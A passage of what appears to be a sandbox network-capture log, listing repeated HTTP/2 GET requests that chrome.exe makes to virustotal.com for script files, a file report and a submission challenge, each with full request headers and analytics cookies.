                                                                                                                                                                      GET /gui/sha256.worker.a6e2f1b9e97a4ea0b474.worker.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: same-origin
                                                                                                                                                                      sec-fetch-dest: worker
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTk4MjY5NTYxODgtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI1LjEyNA==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/submission/challenge
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/submission/challenge HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      cache-control: no-cache
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      x-vt-anti-abuse-header: MTQyMDU5NTE3NDMtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI1LjQzMQ==
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4503.2b0c4f32872d924210c7.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4503.2b0c4f32872d924210c7.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/5005.fc3caf94a0684737c1fd.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/5005.fc3caf94a0684737c1fd.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/9074.7e2a5bbdfe0196aa5d0a.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/9074.7e2a5bbdfe0196aa5d0a.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/9965.2fd257c2ca1b9b66cc0d.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/9965.2fd257c2ca1b9b66cc0d.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4311.914d50b4d95aacf7225b.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4311.914d50b4d95aacf7225b.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/7953.9a6e2044f0e511868a41.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/7953.9a6e2044f0e511868a41.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/6885.e13d423275cffe8e0382.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/6885.e13d423275cffe8e0382.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/2592.8400c60cdfd274a4145e.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/2592.8400c60cdfd274a4145e.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/5701.707b0c8562c1cae0df7d.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/5701.707b0c8562c1cae0df7d.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3334.065f1a91b60b07b0c5dc.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3334.065f1a91b60b07b0c5dc.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/7922.24578c1a71b32f0e51d1.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/7922.24578c1a71b32f0e51d1.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3586.e264ac9d790c1a369398.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3586.e264ac9d790c1a369398.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4985.08366cc6bafa91f6babf.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4985.08366cc6bafa91f6babf.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4092.621dfd5c355e77ea7563.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4092.621dfd5c355e77ea7563.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/773.3b2bdb4fc65a8555b424.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/773.3b2bdb4fc65a8555b424.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4987.4434b42958784426cabc.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4987.4434b42958784426cabc.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/9518.4aad3aaaab65e67ec065.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/9518.4aad3aaaab65e67ec065.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/7858.70d036f29802d9321f7f.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/7858.70d036f29802d9321f7f.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/8912.b2072d637490d0de7a85.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/8912.b2072d637490d0de7a85.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3638.c503caee30980cc9b284.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3638.c503caee30980cc9b284.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4123.14b566c1cb5c59b0718d.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4123.14b566c1cb5c59b0718d.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3175.4f88c9f0852ec3c0344c.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3175.4f88c9f0852ec3c0344c.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3659.7349226393281cbfc478.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3659.7349226393281cbfc478.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
